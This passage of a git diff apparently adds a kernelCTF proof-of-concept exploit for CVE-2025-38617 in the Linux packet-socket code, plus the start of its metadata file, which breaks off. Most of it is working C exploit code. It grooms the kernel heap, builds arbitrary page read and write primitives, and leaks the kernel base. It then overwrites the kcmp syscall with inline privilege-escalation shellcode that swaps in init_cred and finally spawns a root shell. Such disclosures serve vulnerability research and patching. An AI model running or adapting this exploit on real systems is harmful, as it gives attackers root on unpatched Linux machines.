+ NULL, + abr_page_read_write_primitive->overwrite_pg_vec_mmap_size, + PROT_READ | PROT_WRITE, + MAP_SHARED, + abr_page_read_write_primitive->packet_socket_to_overwrite_pg_vec, + 0 + ); + + struct pgv *pgv = mem; + pgv[0].buffer = (char *)page_aligned_addr_to_mmap; + Munmap(mem, abr_page_read_write_primitive->overwrite_pg_vec_mmap_size); + + mem = mmap( + NULL, + abr_page_read_write_primitive->overwritten_pg_vec_mmap_size, + PROT_READ | PROT_WRITE, + MAP_SHARED, + abr_page_read_write_primitive->packet_socket_with_overwritten_pg_vec, + 0 + ); + + if (mem == MAP_FAILED) + return NULL; + + return mem; +} + +void abr_page_read_write_primitive_munmap( + struct abr_page_read_write_primitive *abr_page_read_write_primitive, + void *mem +) +{ + Munmap(mem, abr_page_read_write_primitive->overwritten_pg_vec_mmap_size); + mem = Mmap( + NULL, + abr_page_read_write_primitive->overwrite_pg_vec_mmap_size, + PROT_READ | PROT_WRITE, + MAP_SHARED, + abr_page_read_write_primitive->packet_socket_to_overwrite_pg_vec, + 0 + ); + + struct pgv *pgv = mem; + pgv[0].buffer = (char *)abr_page_read_write_primitive->original_buffer_page_addr; + Munmap(mem, abr_page_read_write_primitive->overwrite_pg_vec_mmap_size); +} + +void *patch_sys_kcmp(struct abr_page_read_write_primitive *abr_page_read_write_primitive) +{ + u64 sys_kcmp_page = __do_sys_kcmp & PAGE_MASK; + u64 sys_kcmp_offset_from_page = __do_sys_kcmp - sys_kcmp_page; + + void *m = abr_page_read_write_primitive_mmap( + abr_page_read_write_primitive, + sys_kcmp_page + ); + + void *overwrite_ptr = m + sys_kcmp_offset_from_page; + void *shellcode = (void *)privilege_escalation_shellcode_begin; + int shellcode_length = (void *)privilege_escalation_shellcode_end - (void *)privilege_escalation_shellcode_begin; + void *saved_opcodes = Calloc(1, shellcode_length); + memcpy(saved_opcodes, overwrite_ptr, shellcode_length); + memcpy(overwrite_ptr, shellcode, shellcode_length); + + abr_page_read_write_primitive_munmap(abr_page_read_write_primitive, 
m); + return saved_opcodes; +} + +u64 find_kernel_base( + struct abr_page_read_write_primitive *abr_page_read_write_primitive, + struct simple_xattr_read_write_primitive *simple_xattr_read_write_primitive +) +{ + pin_thread_on_cpu(CPU_NUMBER_ZERO); + struct simple_xattr *manipulated_simple_xattr = simple_xattr_read_write_primitive_mmap(simple_xattr_read_write_primitive); + + u64 kernel_base = 0; + bool found_pipe_buffer = false; + + while (!found_pipe_buffer) { + int pipe_fd[2] = {}; + Pipe2(pipe_fd, O_DIRECT); + + u8 value[XATTR_SIZE_MAX] = {}; + Setxattr( + simple_xattr_read_write_primitive->manipulated_simple_xattr_request->filepath, + LEAKED_PAGES_ORDER2_ADDRESS_FOR_PIPE_BUFFER_SIMPLE_XATTR_NAME, + value, + KMALLOC_8K_SIZE, + XATTR_CREATE + ); + + u64 pipe_buffer_addr = 0; + if (manipulated_simple_xattr->rb_node.rb_right) + pipe_buffer_addr = (u64)manipulated_simple_xattr->rb_node.rb_right; + else + pipe_buffer_addr = (u64)manipulated_simple_xattr->rb_node.rb_left; + + Removexattr( + simple_xattr_read_write_primitive->manipulated_simple_xattr_request->filepath, + LEAKED_PAGES_ORDER2_ADDRESS_FOR_PIPE_BUFFER_SIMPLE_XATTR_NAME + ); + + Fcntl(pipe_fd[0], F_SETPIPE_SZ, PAGE_COUNT_TO_ALLOCATE_PIPE_BUFFER_ON_PAGES_ORDER2 * PAGE_SIZE); + Write(pipe_fd[1], DATA_TO_TRIGGER_PIPE_BUFFER_FILLIN, strlen(DATA_TO_TRIGGER_PIPE_BUFFER_FILLIN)); + + void *mem = abr_page_read_write_primitive_mmap(abr_page_read_write_primitive, pipe_buffer_addr); + if (mem != NULL) { + if (is_data_look_like_pipe_buffer(mem)) { + struct pipe_buffer *pipe_buffer = mem; + kernel_base = (u64)pipe_buffer->ops - anon_pipe_buf_ops_offset_from_kernel_base; + found_pipe_buffer = true; + } + + abr_page_read_write_primitive_munmap(abr_page_read_write_primitive, mem); + } + + Close(pipe_fd[0]); + Close(pipe_fd[1]); + } + + simple_xattr_read_write_primitive_munmap(simple_xattr_read_write_primitive); + return kernel_base; +} + +int main(void) +{ + setup_nofile_rlimit(); + setup_namespace(); + setup_tmpfs(); + + 
int timerfd = Timerfd_create(CLOCK_MONOTONIC, 0); + struct necessary_threads *necessary_threads = necessary_threads_create(timerfd); + + dummy_network_interface_create(DUMMY_INTERFACE_NAME, IPV6_MIN_MTU - 1); + int configure_network_interface_socket = Socket(AF_INET, SOCK_DGRAM, IPPROTO_IP); + network_interface_up(configure_network_interface_socket, DUMMY_INTERFACE_NAME); + + struct pages_order2_read_primitive pages_order2_read_primitive = pages_order2_read_primitive_build( + necessary_threads, + configure_network_interface_socket, + timerfd + ); + + fprintf(stderr, "pages_order2_read_primitive build success\n"); + + struct simple_xattr_read_write_primitive simple_xattr_read_write_primitive = simple_xattr_read_write_primitive_build( + necessary_threads, + configure_network_interface_socket, + timerfd, + &pages_order2_read_primitive + ); + + fprintf(stderr, "simple_xattr_read_write_primitive build success\n"); + + struct abr_page_read_write_primitive abr_page_read_write_primitive = {}; + abr_page_read_write_primitive_build_primitive( + &abr_page_read_write_primitive, + &simple_xattr_read_write_primitive, + &pages_order2_read_primitive + ); + + fprintf(stderr, "abr_page_read_write_primitive_build_primitive success\n"); + + u64 kernel_base = find_kernel_base(&abr_page_read_write_primitive, &simple_xattr_read_write_primitive); + fprintf(stderr, "[+] kernel base: 0x%016lx\n", kernel_base); + update_kernel_address(kernel_base); + void *sys_kcmp_saved_opcodes = patch_sys_kcmp(&abr_page_read_write_primitive); + + int not_used = -1; + syscall(SYS_kcmp, (u32)(init_cred >> 32), (u32)(init_cred), not_used, init_fs, __x86_return_thunk); + + char *sh_args[] = {"sh", NULL}; + execve("/bin/sh", sh_args, NULL); +} diff --git a/pocs/linux/kernelctf/CVE-2025-38617_mitigation_cos/exploit/mitigation-v4-6.6/exploit.h b/pocs/linux/kernelctf/CVE-2025-38617_mitigation_cos/exploit/mitigation-v4-6.6/exploit.h new file mode 100644 index 000000000..85af57e69 --- /dev/null +++ 
b/pocs/linux/kernelctf/CVE-2025-38617_mitigation_cos/exploit/mitigation-v4-6.6/exploit.h @@ -0,0 +1,682 @@ +#ifndef EXPLOIT_H +#define EXPLOIT_H + +#define _GNU_SOURCE +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +typedef int64_t s64; +typedef uint64_t u64; +typedef uint32_t u32; +typedef uint16_t u16; +typedef uint8_t u8; + +struct pgv { + char *buffer; +}; + +static_assert(sizeof(struct pgv) == 8, "sizeof(struct pgv) not match with kernel"); + +static inline bool is_data_look_like_pgv(struct pgv *pgv, size_t count) +{ + bool is_pgv = true; + + for (size_t i = 0; i < count && is_pgv; i++) { + u64 kernel_page_addr = (u64)(pgv[i].buffer); + if ((kernel_page_addr >> 48) != 0xFFFF) + is_pgv = false; + } + + return is_pgv; +} + +static inline void pgv_dump(struct pgv *pgv, size_t len) +{ + for (size_t i = 0; i < len; i++) { + printf("pgv[%zu] = 0x%016lx\n", i, (u64)(pgv[i].buffer)); + } +} + +struct rb_node { + unsigned long __rb_parent_color; + struct rb_node *rb_right; + struct rb_node *rb_left; +} __attribute__((aligned(sizeof(long)))); + +static_assert(sizeof(struct rb_node) == 24, "sizeof(struct rb_node) not match with kernel"); + +struct simple_xattr { + struct rb_node rb_node; + char *name; + size_t size; + char value[]; +}; + +static_assert(sizeof(struct simple_xattr) == 40, "sizeof(struct simple_xattr) not match with kernel"); + +#define UNUSED_FUNCTION_PARAMETER(x) (void)(x) +#define ARRAY_SIZE(arr) (sizeof(arr) / sizeof((arr)[0])) + +#define KMALLOC_8K_SIZE 8192 +#define KMALLOC_8_SIZE 8 +#define PAGE_SIZE 4096UL +#define PAGE_MASK (~(PAGE_SIZE - 1)) +#define PAGES_ORDER1_SIZE (PAGE_SIZE * 2) +#define 
PAGES_ORDER2_SIZE (PAGE_SIZE * 4) +#define PAGES_ORDER3_SIZE (PAGE_SIZE * 8) +#define PAGES_ORDER4_SIZE (PAGE_SIZE * 16) +#define PAGES_ORDER5_SIZE (PAGE_SIZE * 32) +#define CPU_NUMBER_ZERO 0 +#define CPU_NUMBER_ONE 1 +#define NSEC_PER_SEC 1000000000L +#define NSEC_PER_USEC 1000L +#define USEC_PER_SEC 1000000L +#define TOTAL_TIMERFD_WAITLIST_THREADS 180 + +#define MIN_PAGE_COUNT_TO_ALLOCATE_PGV_ON_PAGES_ORDER2 ((KMALLOC_8K_SIZE / sizeof(struct pgv)) + 1) +#define MIN_PAGE_COUNT_TO_ALLOCATE_PGV_ON_KMALLOC_16 ((KMALLOC_8_SIZE / sizeof(struct pgv)) + 1) + +#define PAGE_COUNT_TO_ALLOCATE_PIPE_BUFFER_ON_PAGES_ORDER2 256 +#define DATA_TO_TRIGGER_PIPE_BUFFER_FILLIN "fillin_pipe_buffer" + +#define MAX_FILTER_LEN 700 +#define MAX_NICE 19 + +#define TMPFS_MOUNT_POINT "/tmp/tmpfs" +#define DUMMY_INTERFACE_NAME "pwn_dummy" + +#define __rb_parent(pc) ((struct rb_node *)(pc & ~3)) + +u64 anon_pipe_buf_ops_last_24_bits = 0xc4a600; +u64 anon_pipe_buf_ops_offset_from_kernel_base = 0x1c4a600; +u64 struct_task_struct_member_cred_offset = 0x7c0; +u64 struct_task_struct_member_real_cred_offset = 0x7b8; +u64 init_cred = 0x2c72ec0; +u64 init_fs = 0x2dad900; +u64 __x86_return_thunk = 0x14855d0; +u64 __do_sys_kcmp = 0x273d70; + +static inline void update_kernel_address(u64 kernel_base) +{ + init_cred += kernel_base; + init_fs += kernel_base; + __x86_return_thunk += kernel_base; + __do_sys_kcmp += kernel_base; +} + +static inline bool is_data_look_like_simple_xattr(void *data, size_t value_size) +{ + struct simple_xattr *simple_xattr = data; + struct rb_node rb_node = simple_xattr->rb_node; + struct rb_node *rb_parent = __rb_parent(rb_node.__rb_parent_color); + + if ( + (rb_parent == NULL || (((u64)(rb_parent)) >> 48) == 0xFFFF) && + (rb_node.rb_left == NULL || (((u64)(rb_node.rb_left)) >> 48) == 0xFFFF) && + (rb_node.rb_right == NULL || (((u64)(rb_node.rb_right)) >> 48) == 0xFFFF) && + (((u64)(simple_xattr->name) >> 48) == 0xFFFF) && + (simple_xattr->size == value_size) + ) + return true; 
+ + return false; +} + +static inline void simple_xattr_dump(struct simple_xattr *simple_xattr) +{ + struct rb_node *rb_node = &(simple_xattr->rb_node); + printf("====== simple_xattr_dump ======\n"); + printf("rb_parent: 0x%016lx\n", rb_node->__rb_parent_color); + printf("rb_left: 0x%016lx\n", (u64)rb_node->rb_left); + printf("rb_right: 0x%016lx\n", (u64)(rb_node->rb_right)); + printf("name: 0x%016lx\n", (u64)(simple_xattr->name)); + printf("value_size: 0x%016lx\n", (u64)(simple_xattr->size)); + printf("value: %s\n", (char *)(simple_xattr->value)); +} + +struct pipe_buffer { + void *page; + unsigned int offset, len; + void *ops; + unsigned int flags; + unsigned long private; +}; + +static_assert(sizeof(struct pipe_buffer) == 40, "sizeof(struct pipe_buffer) not match with kernel"); + +static inline bool is_data_look_like_pipe_buffer(struct pipe_buffer *pipe_buffer) +{ + if ( + (((u64)(pipe_buffer->page) >> 48) == 0xFFFF) && + (((u64)(pipe_buffer->ops) & 0xFFFFFF) == anon_pipe_buf_ops_last_24_bits) + ) + return true; + + return false; +} + +static inline void pipe_buffer_dump(struct pipe_buffer *pipe_buffer) +{ + printf("====== pipe_buffer_dump ======\n"); + printf("page: 0x%016lx\n", (u64)(pipe_buffer->page)); + printf("offset: %u, len: %u\n", pipe_buffer->offset, pipe_buffer->len); + printf("ops: 0x%016lx\n", (u64)(pipe_buffer->ops)); + printf("flags: %u\n", pipe_buffer->flags); + printf("private: 0x%016lx\n", pipe_buffer->private); +} + +/* Error handling */ +void unix_error(const char *msg); +void Mnl_socket_error(const char *msg); +void Pthread_error(const char *msg, int error_code); +/* Error handling */ + +/* libc wrapper */ + +void Unshare(int flags); +int Socket(int domain, int type, int protocol); +void Setsockopt(int fd, int level, int optname, const void *optval, socklen_t optlen); +void Getsockopt(int fd, int level, int optname, void *optval, socklen_t *optlen); +void Bind(int fd, const struct sockaddr *addr, socklen_t addrlen); +void Ioctl(int fd, 
unsigned long request, unsigned long arg); +void Close(int fd); +int Dup(int fd); +void Pipe2(int pipefd[2], int flags); +int Fcntl(int fd, int op, unsigned long arg); +void *Mmap(void *addr, size_t len, int prot, int flags, int fd, off_t offset); +void Munmap(void *addr, size_t len); +FILE *Fopen(const char *filename, const char *modes); +void Fclose(FILE *stream); +void *Calloc(size_t nmemb, size_t size); +ssize_t Sendmsg(int socket, const struct msghdr *message, int flags); +void Pthread_create(pthread_t *newthread, const pthread_attr_t *attr, void *(*start_routine) (void *), void *arg); +void Pthread_join(pthread_t thread, void **retval); +void Pthread_setaffinity_np(pthread_t thread, size_t cpusetsize, const cpu_set_t *cpuset); +void Getrlimit(int resource, struct rlimit *rlim); +void Setrlimit(int resource, const struct rlimit *rlim); +void Setpriority(int which, id_t who, int value); +int Timerfd_create(int clockid, int flags); +void Timerfd_settime(int fd, int flags, const struct itimerspec *new_value, struct itimerspec *old_value); +int Epoll_create1(int flags); +void Epoll_ctl(int epfd, int op, int fd, struct epoll_event *event); +unsigned int If_nametoindex(const char *ifname); +void Mkdir(const char *pathname, mode_t mode); +void Mount(const char *source, const char *target, const char *filesystemtype, unsigned long mountflags, const void *data); +int Open(const char *pathname, int flags, mode_t mode); +void Setxattr(const char *path, const char *name, const void *value, size_t size, int flags); +ssize_t Getxattr(const char *path, const char *name, void *value, size_t size); +void Removexattr(const char *path, const char *name); +char *Strdup(const char *s); +ssize_t Read(int fd, void *buf, size_t count); +ssize_t Write(int fd, const void *buf, size_t count); +/* libc wrapper */ + +/* libmnl wrapper */ +struct mnl_socket *Mnl_socket_open(int bus); +void Mnl_socket_close(struct mnl_socket *nl); +void Mnl_socket_bind(struct mnl_socket *nl, unsigned int 
groups, pid_t pid); +ssize_t Mnl_socket_sendto(const struct mnl_socket *nl, const void *req, size_t size); +ssize_t Mnl_socket_recvfrom(const struct mnl_socket *nl, void *buf, size_t size); +/* libmnl wrapper */ + +void validate_mnl_socket_operation_success(struct mnl_socket *nl, u32 seq); +void dummy_network_interface_create(const char *ifname, u32 mtu); +void network_interface_up(int configure_socket_fd, const char *ifname); +void network_interface_down(int configure_socket_fd, const char *ifname); +void pin_thread_on_cpu(int cpu); +void setup_namespace(void); +void setup_tmpfs(void); +void setup_nofile_rlimit(void); +void create_file(const char *path); +bool thread_in_sleep_state(int tid); +void alloc_pages(int packet_socket, unsigned page_count, unsigned page_size); +void free_pages(int packet_socket); + +struct victim_packet_socket_config { + struct __kernel_sock_timeval sndtimeo; + struct sockaddr_ll addr; + struct tpacket_req3 tx_ring; + struct tpacket_req3 rx_ring; + int packet_loss; + int packet_version; + unsigned packet_reserve; + struct sock_filter filter[MAX_FILTER_LEN]; +}; + +struct victim_packet_socket_config *victim_packet_socket_config_create( + struct __kernel_sock_timeval sndtimeo, + struct sockaddr_ll addr, + struct tpacket_req3 tx_ring, + struct tpacket_req3 rx_ring, + int packet_loss, + int packet_version, + unsigned packet_reserve, + struct sock_filter filter[MAX_FILTER_LEN] +); + +void victim_packet_socket_config_destroy(struct victim_packet_socket_config *config); + +struct victim_packet_socket { + struct victim_packet_socket_config *config; + int fd; +}; + +struct victim_packet_socket *victim_packet_socket_create(struct victim_packet_socket_config *config); +void victim_packet_socket_destroy(struct victim_packet_socket *v); +void victim_packet_socket_configure(struct victim_packet_socket *v); + +struct simple_xattr_request { + char filepath[PATH_MAX]; + char name[XATTR_NAME_MAX + 1]; + char *value; + size_t value_size; + bool allocated; 
+}; + +struct simple_xattr_request *simple_xattr_request_create( + const char *filepath, + const char *name, + const char *value, + size_t value_size +); + +void simple_xattr_request_destroy(struct simple_xattr_request *request); + +struct timerfd_waitlist_thread { + pthread_t handle; + pthread_mutex_t mutex; + pthread_cond_t cond; + bool ready_to_work; + bool work_complete; + bool unshare_complete; + bool quit; + atomic_int tid; + int timerfd; + int *timerfds; + int total_timerfd; + struct epoll_event *epoll_events; +}; + +void *timerfd_waitlist_thread_fn(void *arg); +void timerfd_waitlist_thread_wait_unshare_complete(struct timerfd_waitlist_thread *t); +void timerfd_waitlist_thread_send_work(struct timerfd_waitlist_thread *t); +void timerfd_waitlist_thread_wait_in_work(struct timerfd_waitlist_thread *t); +void timerfd_waitlist_thread_wait_work_complete(struct timerfd_waitlist_thread *t); +void timerfd_waitlist_thread_quit(struct timerfd_waitlist_thread *t); +struct timerfd_waitlist_thread *timerfd_waitlist_thread_create(int timerfd); +void timerfd_waitlist_thread_destroy(struct timerfd_waitlist_thread *t); + +struct pg_vec_lock_thread_work { + struct victim_packet_socket *victim_packet_socket; + int ifindex; +}; + +struct pg_vec_lock_thread_work *pg_vec_lock_thread_work_create(struct victim_packet_socket *v, int ifindex); +void pg_vec_lock_thread_work_destroy(struct pg_vec_lock_thread_work *w); + +struct pg_vec_lock_thread { + pthread_t handle; + pthread_mutex_t mutex; + pthread_cond_t cond; + bool ready_to_work; + bool work_complete; + bool quit; + atomic_int tid; + int packet_socket; + int ifindex; + struct pg_vec_lock_thread_work *work; +}; + +void *pg_vec_lock_thread_fn(void *arg); +void pg_vec_lock_thread_send_work(struct pg_vec_lock_thread *t, struct pg_vec_lock_thread_work *w); +struct timespec pg_vec_lock_thread_wait_in_work(struct pg_vec_lock_thread *t); +void pg_vec_lock_thread_wait_work_complete(struct pg_vec_lock_thread *t); +void 
pg_vec_lock_thread_quit(struct pg_vec_lock_thread *t); +struct pg_vec_lock_thread *pg_vec_lock_thread_create(void); +void pg_vec_lock_thread_destroy(struct pg_vec_lock_thread *t); + +struct pg_vec_buffer_thread { + pthread_t handle; + pthread_mutex_t mutex; + pthread_cond_t cond; + bool ready_to_work; + bool work_complete; + bool unshare_complete; + bool quit; + atomic_int tid; + struct pg_vec_buffer_thread_work *work; +}; + +struct pg_vec_buffer_thread_work { + struct victim_packet_socket *victim_packet_socket; + bool exploit; + bool cleanup; +}; + +struct pg_vec_buffer_thread_work *pg_vec_buffer_thread_work_create( + struct victim_packet_socket *v, + bool exploit, + bool cleanup +); +void pg_vec_buffer_thread_work_destroy(struct pg_vec_buffer_thread_work *w); + +void *pg_vec_buffer_thread_fn(void *arg); +void pg_vec_buffer_thread_send_work(struct pg_vec_buffer_thread *t, struct pg_vec_buffer_thread_work *w); +void pg_vec_buffer_thread_wait_in_work(struct pg_vec_buffer_thread *t); +void pg_vec_buffer_thread_wait_work_complete(struct pg_vec_buffer_thread *t); +void pg_vec_buffer_thread_quit(struct pg_vec_buffer_thread *t); +struct pg_vec_buffer_thread *pg_vec_buffer_thread_create(void); +void pg_vec_buffer_thread_destroy(struct pg_vec_buffer_thread *t); + +struct tpacket_rcv_thread_work { + struct timespec pg_vec_lock_release_time; + struct timespec decrease_tpacket_rcv_thread_sleep_time; + struct msghdr *msg; +}; + +struct tpacket_rcv_thread_work *tpacket_rcv_thread_work_create( + struct timespec pg_vec_lock_release_time, + struct timespec decrease_tpacket_rcv_thread_sleep_time, + struct msghdr *msg +); + +void tpacket_rcv_thread_work_destroy(struct tpacket_rcv_thread_work *w); + +struct tpacket_rcv_thread { + pthread_t handle; + pthread_mutex_t mutex; + pthread_cond_t cond; + bool ready_to_work; + bool work_complete; + bool quit; + struct tpacket_rcv_thread_work *work; +}; + +void *tpacket_rcv_thread_fn(void *arg); +void tpacket_rcv_thread_send_work(struct 
tpacket_rcv_thread *t, struct tpacket_rcv_thread_work *w); +void tpacket_rcv_thread_wait_work_complete(struct tpacket_rcv_thread *t); +void tpacket_rcv_thread_quit(struct tpacket_rcv_thread *t); +struct tpacket_rcv_thread *tpacket_rcv_thread_create(void); +void tpacket_rcv_thread_destroy(struct tpacket_rcv_thread *t); + +struct msghdr *msghdr_create( + void *data, + size_t datalen, + const char *devname +); + +void msghdr_destroy(struct msghdr *msghdr); + +static inline struct timespec timespec_sub(struct timespec t1, struct timespec t2) +{ + struct timespec diff = {}; + diff.tv_nsec = t1.tv_nsec - t2.tv_nsec; + diff.tv_sec = t1.tv_sec - t2.tv_sec; + + if (diff.tv_sec > 0 && diff.tv_nsec < 0) { + diff.tv_nsec += NSEC_PER_SEC; + diff.tv_sec--; + } else if (diff.tv_sec < 0 && diff.tv_nsec > 0) { + diff.tv_nsec -= NSEC_PER_SEC; + diff.tv_sec++; + } + + return diff; +} + +static inline struct timespec timespec_add(struct timespec t1, struct timespec t2) +{ + struct timespec sum = {}; + sum.tv_nsec = t1.tv_nsec + t2.tv_nsec; + sum.tv_sec = t1.tv_sec + t2.tv_sec; + + if (sum.tv_nsec >= NSEC_PER_SEC) { + sum.tv_sec++; + sum.tv_nsec -= NSEC_PER_SEC; + } + + return sum; +} + +static inline u64 timespec_div(struct timespec t1, struct timespec t2) +{ + u64 ns1 = t1.tv_sec * NSEC_PER_SEC + t1.tv_nsec; + u64 ns2 = t2.tv_sec * NSEC_PER_SEC + t2.tv_nsec; + return ns1 / ns2; +} + +static inline int timespec_cmp(struct timespec t1, struct timespec t2) +{ + if (t1.tv_sec < t2.tv_sec) + return -1; + + if (t1.tv_sec > t2.tv_sec) + return 1; + + if (t1.tv_nsec < t2.tv_nsec) + return -1; + + if (t1.tv_nsec > t2.tv_nsec) + return 1; + + return 0; +} + +static struct timespec null_timespec = { .tv_sec = 0, .tv_nsec = 0 }; + +struct necessary_threads { + struct timerfd_waitlist_thread **timerfd_waitlist_threads; + struct pg_vec_lock_thread *pg_vec_lock_thread; + struct pg_vec_buffer_thread *pg_vec_buffer_thread; + struct tpacket_rcv_thread *tpacket_rcv_thread; +}; + +struct 
necessary_threads *necessary_threads_create(int timerfd); +void necessary_threads_destroy(struct necessary_threads *nt); + +#define PAGES_ORDER2_GROOM_SIMPLE_XATTR_FILEPATH "/tmp/tmpfs/pages_order2_groom" +#define PAGES_ORDER2_GROOM_SIMPLE_XATTR_NAME_FMT "security.pages_order2_groom_%d" +#define PAGES_ORDER2_GROOM_SIMPLE_XATTR_VALUE_FMT "pages_order2_groom_%d" +#define PAGES_ORDER2_GROOM_SIMPLE_XATTR_VALUE_BEGIN "pages_order2_groom_" +#define TOTAL_PAGES_ORDER2_SIMPLE_XATTR_SPRAY 2048 + +struct pages_order2_read_primitive { + struct victim_packet_socket_config *victim_packet_socket_config; + int drain_pages_order2_packet_socket; + int drain_pages_order3_packet_socket_1; + int drain_pages_order3_packet_socket_2; + struct simple_xattr_request *simple_xattr_requests[TOTAL_PAGES_ORDER2_SIMPLE_XATTR_SPRAY]; + struct simple_xattr_request *overflowed_simple_xattr_request; + struct simple_xattr_request *leaked_content_simple_xattr_request; + u64 overflowed_simple_xattr_kernel_address; + u64 leaked_content_simple_xattr_kernel_address; +}; + +void pages_order2_read_primitive_init(struct pages_order2_read_primitive *primitive); +void pages_order2_read_primitive_cleanup(struct pages_order2_read_primitive *primitive); +void pages_order2_read_primitive_page_drain(struct pages_order2_read_primitive *primitive); +void pages_order2_read_primitive_page_drain_cleanup(struct pages_order2_read_primitive *primitive); +void pages_order2_read_primitive_setup_simple_xattr(struct pages_order2_read_primitive *primitive); +void pages_order2_read_primitive_cleanup_simple_xattr(struct pages_order2_read_primitive *primitive); +void pages_order2_read_primitive_main_work( + struct pages_order2_read_primitive *primitive, + struct necessary_threads *necessary_threads, + int timerfd, + int configure_network_interface_socket, + struct timespec timer_interrupt_amplitude, + struct timespec decrease_tpacket_rcv_thread_sleep_time +); + +bool pages_order2_read_primitive_build_primitive( + struct 
pages_order2_read_primitive *primitive, + struct necessary_threads *necessary_threads, + int configure_network_interface_socket, + int timerfd, + struct timespec decrease_tpacket_rcv_thread_sleep_time, + struct timespec timer_interrupt_amplitude +); + +struct pages_order2_read_primitive pages_order2_read_primitive_build( + struct necessary_threads *necessary_threads, + int configure_network_interface_socket, + int timerfd +); + +void *pages_order2_read_primitive_trigger(struct pages_order2_read_primitive *pages_order2_read_primitive); +bool pages_order2_read_primitive_build_leaked_simple_xattr(struct pages_order2_read_primitive *pages_order2_read_primitive); + +#define SIMPLE_XATTR_LEAKED_PAGES_ORDER3_ADDRESS_NAME_FMT "security.leaked_pages_order3_addr_%d" +#define SIMPLE_XATTR_LEAKED_PAGES_ORDER3_ADDRESS_VALUE_FMT "leaked_pages_order3_addr_%d" + +#define TOTAL_PAGES_ORDER2_PG_VEC_SPRAY 256 + +struct simple_xattr_read_write_primitive { + struct victim_packet_socket_config *victim_packet_socket_config; + int drain_pages_order2_packet_socket; + int drain_pages_order3_packet_socket_1; + int drain_pages_order3_packet_socket_2; + int spray_pg_vec_packet_sockets[TOTAL_PAGES_ORDER2_PG_VEC_SPRAY]; + int spray_pg_vec_packet_sockets_state[TOTAL_PAGES_ORDER2_PG_VEC_SPRAY]; + int overflowed_pg_vec_packet_socket; + struct simple_xattr_request *manipulated_simple_xattr_request; + void *mmap_address; +}; + +void simple_xattr_read_write_primitive_init(struct simple_xattr_read_write_primitive *primitive); +void simple_xattr_read_write_primitive_page_drain(struct simple_xattr_read_write_primitive *primitive); +void simple_xattr_read_write_primitive_setup_pg_vec(struct simple_xattr_read_write_primitive *primitive); +void simple_xattr_read_write_primitive_page_drain_cleanup(struct simple_xattr_read_write_primitive *primitive); +void simple_xattr_read_write_primitive_pg_vec_cleanup(struct simple_xattr_read_write_primitive *primitive); +void simple_xattr_read_write_primitive_main_work( 
+ struct simple_xattr_read_write_primitive *primitive, + struct necessary_threads *necessary_threads, + int timerfd, + int configure_network_interface_socket, + struct timespec timer_interrupt_amplitude, + struct timespec decrease_tpacket_rcv_thread_sleep_time, + u64 simple_xattr_kernel_address +); + +bool simple_xattr_read_write_primitive_build_primitive( + struct simple_xattr_read_write_primitive *simple_xattr_read_write_primitive, + struct pages_order2_read_primitive *pages_order2_read_primitive, + struct necessary_threads *necessary_threads, + int timerfd, + int configure_network_interface_socket, + struct timespec decrease_tpacket_rcv_thread_sleep_time, + struct timespec timer_interrupt_amplitude +); + +struct simple_xattr_read_write_primitive simple_xattr_read_write_primitive_build( + struct necessary_threads *necessary_threads, + int configure_network_interface_socket, + int timerfd, + struct pages_order2_read_primitive *pages_order2_read_primitive +); + +struct simple_xattr *simple_xattr_read_write_primitive_mmap(struct simple_xattr_read_write_primitive *simple_xattr_read_write_primitive); +void simple_xattr_read_write_primitive_munmap(struct simple_xattr_read_write_primitive *simple_xattr_read_write_primitive); + +#define LEAK_PAGES_ORDER2_FOR_FAKE_SIMPLE_XATTR_NAME__SIMPLE_XATTR_NAME "security.leak_pages_order2_for_fake_simple_xattr_name" +#define LEAK_PAGES_ORDER2_FOR_FAKE_SIMPLE_XATTR__SIMPLE_XATTR_NAME "security.leak_pages_order2_for_fake_simple_xattr" + +#define FAKE_SIMPLE_XATTR_NAME "security.fake_simple_xattr_name" +#define DETECT_FAKE_SIMPLE_XATTR_RECLAIMATION "security.detect_fake_simple_xattr_reclaimation" + +struct abr_page_read_write_primitive { + int packet_socket_with_overwritten_pg_vec; + int packet_socket_to_overwrite_pg_vec; + u64 overwrite_pg_vec_mmap_size; + u64 overwritten_pg_vec_mmap_size; + u64 original_buffer_page_addr; +}; + +void abr_page_read_write_primitive_build_primitive( + struct abr_page_read_write_primitive 
*abr_page_read_write_primitive, + struct simple_xattr_read_write_primitive *simple_xattr_read_write_primitive, + struct pages_order2_read_primitive *pages_order2_read_write_primitive +); + +void *abr_page_read_write_primitive_mmap( + struct abr_page_read_write_primitive *abr_page_read_write_primitive, + u64 page_aligned_addr_to_mmap +); + +void abr_page_read_write_primitive_munmap( + struct abr_page_read_write_primitive *abr_page_read_write_primitive, + void *mem +); + +#define LEAKED_PAGES_ORDER2_ADDRESS_FOR_PIPE_BUFFER_SIMPLE_XATTR_NAME "security.leaked_pages_order2_addr_for_pipe_buffer" + +u64 find_kernel_base( + struct abr_page_read_write_primitive *abr_page_read_write_primitive, + struct simple_xattr_read_write_primitive *simple_xattr_read_write_primitive +); + +void *patch_sys_kcmp(struct abr_page_read_write_primitive *abr_page_read_write_primitive); + +extern void privilege_escalation_shellcode_begin(void); +extern void privilege_escalation_shellcode_end(void); + +__asm__( + ".intel_syntax noprefix;" + ".global privilege_escalation_shellcode_begin;" + ".global privilege_escalation_shellcode_end;" + + "privilege_escalation_shellcode_begin:\n" + + "mov rax,QWORD PTR gs:0x32380;" + "shl rdi, 32;" + "shl rsi, 32;" + "shr rsi, 32;" + "or rdi, rsi;" + "mov QWORD PTR [rax + 0x7c0], rdi;" + "mov QWORD PTR [rax + 0x7b8], rdi;" + "mov QWORD PTR [rax + 0x810], rcx;" + "jmp r8;" + + "privilege_escalation_shellcode_end:\n" + ".att_syntax;" +); + +#endif diff --git a/pocs/linux/kernelctf/CVE-2025-38617_mitigation_cos/metadata.json b/pocs/linux/kernelctf/CVE-2025-38617_mitigation_cos/metadata.json new file mode 100644 index 000000000..cf594d46d --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2025-38617_mitigation_cos/metadata.json @@ -0,0 +1,30 @@ +{ + "$schema": "https://google.github.io/security-research/kernelctf/metadata.schema.v3.json", + "submission_ids": ["exp375", "exp396"], + "vulnerability": { + "cve": "CVE-2025-38617", + "patch_commit": 
